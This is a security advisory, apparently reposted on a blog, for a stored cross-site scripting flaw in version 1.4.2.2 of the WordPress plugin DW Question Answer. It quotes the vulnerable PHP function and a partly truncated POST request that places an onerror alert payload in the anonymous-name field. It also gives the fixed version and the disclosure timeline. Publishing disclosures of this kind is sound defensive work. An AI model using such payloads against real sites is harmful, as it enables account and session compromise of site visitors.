#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/
#Date : 11/3/2016
XSS Vulnerability:
------------------------------
Description:
------------------------------
"_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS.
------------------------------
Vulnerable Code:
------------------------------
User.php
function dwqa_get_author( $post_id = false ) {
if ( !$post_id ) {
$post_id = get_the_ID();
}
$display_name = false;
if ( dwqa_is_anonymous( $post_id ) ) {
$anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
if ( $anonymous_name ) {
$display_name = $anonymous_name;
} else {
$display_name = __( 'Anonymous', 'dwqa' );
}
} else {
$user_id = get_post_field( 'post_author', $post_id );
$display_name = get_the_author_meta( 'display_name', $user_id );
}
return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
------------------------------
Exploit:
------------------------------
POST /index.php/dwqa-ask-question/ HTTP/1.1
question-title=abc&question-
abc%40gmail.com&_dwqa_
onerror%3Dalert%281%29%3E%3C%
3164a8f439&_wp_http_referer=%
------------------------------
POC:
------------------------------
https://0x62626262.files.
Fix:
Update to 1.4.2.3
Vulnerability Disclosure Timeline:
→ March 3, 2016 – Bug discovered, initial report to WordPress
→ March 7, 2016 – No response, Report sent again.
→ March 8, 2016 – WordPress response, plugin taken down
→ March 11, 2016 – Vendor deployed a patch
##############################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
##############################
Pub Ref:
https://wordpress.org/plugins/
Komentarų nėra:
Rašyti komentarą